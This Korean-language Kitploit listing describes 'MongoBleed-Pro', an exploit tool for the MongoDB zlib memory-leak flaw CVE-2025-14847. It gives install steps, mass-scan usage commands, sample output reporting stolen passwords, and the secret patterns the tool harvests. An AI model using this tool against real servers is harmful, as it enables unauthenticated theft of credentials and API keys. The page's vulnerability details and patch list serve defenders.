Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-14847_Expolit — MongoDB의 zlib 압축 처리에서 발생하는 심각한 메모리 정보 노출 취약점입니다. 이 도구를 사용하면 보안 연구원들이 취약한 MongoDB 인스턴스에서 민감한 데이터를 추출할 수 있습니다. | Kitploit
도구/GitHubGitHub/cybertechajju/cve-2025-14847_expolit
Memory ForensicsVulnerability AnalysisExploitationData ExfiltrationInformation GatheringPenetration TestingSecret DetectionLearning & EducationDatabase Security

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHubcybertechajju/cve-2025-14847_expolit

CVE-2025-14847_Expolit

MongoDB의 zlib 압축 처리에서 발생하는 심각한 메모리 정보 노출 취약점입니다. 이 도구를 사용하면 보안 연구원들이 취약한 MongoDB 인스턴스에서 민감한 데이터를 추출할 수 있습니다.

저장소 보기
3337개월 전Kitploit 검토 완료

MongoBleed-Pro ☠️

CVE Python License Status

고급 MongoDB 메모리 누수 익스플로잇 도구
CyberTechAjju와 함께 계속 배우고, 계속 해킹하세요


🔥 소개

MongoBleed-Pro는 MongoDB의 zlib 압축 처리에서 발생하는 심각한 메모리 노출 취약점인 CVE-2025-14847을 위한 고급 익스플로잇 도구입니다. 이 도구를 통해 보안 연구원들은 취약한 MongoDB 인스턴스에서 민감한 데이터를 추출할 수 있습니다.

⚠️ 면책 조항

이 도구는 승인된 보안 테스트 및 교육 목적으로만 사용해야 합니다. 컴퓨터 시스템에 대한 무단 접근은 불법입니다. 테스트 전에 항상 적절한 승인을 받으십시오.


💀 취약점 세부 정보

속성세부 정보
CVE IDCVE-2025-14847
취약점 유형메모리 노출
영향받는 버전MongoDB < 8.0.10, < 7.3.6, < 7.0.19, < 6.0.23
근본 원인zlib 압축 해제 시 버퍼 오버리드
영향인증되지 않은 원격 메모리 누수

🚀 기능

  • ☠️ 해커 스타일 UI - 애니메이션이 포함된 엘리트 터미널 인터페이스
  • ⚡ 멀티스레드 스캐닝 - 스레드 수를 구성할 수 있는 빠른 메모리 추출
  • 🎯 자동 취약점 탐지 - 익스플로잇 전 자동 취약점 검사
  • 🔑 비밀 패턴 탐지 - AWS 키, API 토큰, 비밀번호, 이메일 탐지
  • 📊 실시간 진행 상황 - 실시간 메모리 누수 시각화
  • 💾 데이터 내보내기 - 추출된 데이터를 분석용 파일로 저장
  • 🌐 대량 스캐닝 - 파일에서 여러 대상을 스캔

📦 설치

root@kitploit:~
# Clone the repository
git clone https://github.com/cybertechajju/CVE-2025-14847_Expolit.git
cd CVE-2025-14847_Expolit

# Install dependencies
pip install -r requirements.txt

🎮 사용법

기본 사용법

root@kitploit:~
python3 mongobleed_pro.py

특정 호스트 대상

root@kitploit:~
python3 mongobleed_pro.py --target 192.168.1.100

사용자 지정 포트

root@kitploit:~
python3 mongobleed_pro.py --target 192.168.1.100:27018

대량 스캐닝

root@kitploit:~
python3 mongobleed_pro.py --file targets.txt

고급 옵션

root@kitploit:~
python3 mongobleed_pro.py --target 192.168.1.100 --threads 100 --min-offset 100 --max-offset 20000

전체 옵션


📸 스크린샷

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║  💀 INITIATING MEMORY EXTRACTION SEQUENCE 💀                 ║
╚══════════════════════════════════════════════════════════════╝

⚡ Target Acquired: 192.168.1.100:27017
   ✓ Port OPEN
   ☠️  VULNERABLE! Initiating attack...

  ◉ 0x0E31 │ nr_inactive_anon 134420\nnr_active_anon 110832...
  ☠️  LOOT ACQUIRED: 🔐 Password
      → admin_pass=SuperSecret123

╔══════════════════ EXTRACTION COMPLETE ══════════════════╗
║  💾 Bytes Extracted: 125,847
║  📦 Unique Fragments: 342
║  🔑 Secrets Found: 5
╚══════════════════════════════════════════════════════════╝

🔑 탐지되는 비밀 유형

  • 🔑 AWS 액세스 키 (AKIA...)
  • 🤖 OpenAI API 키 (sk-...)
  • 🐙 GitHub 토큰 (ghp_...)
  • 🔐 비밀번호 및 비밀
  • 📧 이메일 주소

📁 출력 파일

파일설명
loot_<host>.txt읽기 가능한 형식으로 추출된 비밀
dump_<host>.bin수동 분석을 위한 원시 메모리 덤프

🛡️ 완화 조치

MongoDB 관리자라면 패치된 버전으로 업데이트하세요:

  • MongoDB 8.0.10+
  • MongoDB 7.3.6+
  • MongoDB 7.0.19+
  • MongoDB 6.0.23+

👤 작성자

CyberTechAjju

  • 🐦 트위터: @CyberTechAjju

📜 라이선스

이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다. 자세한 내용은 LICENSE 파일을 참조하세요.


⭐ 지원

이 도구가 유용했다면 GitHub에서 ⭐를 눌러 주세요!


「 계속 배우자 | 계속 해킹하자 」
CyberTechAjju가 ❤️로 만들었습니다

도구 다운로드
인자설명기본값
--target대상 IP/URL대화형 프롬프트
--file대상 목록이 포함된 파일없음
--threads스레드 수50
--min-offset최소 메모리 오프셋20
--max-offset최대 메모리 오프셋8192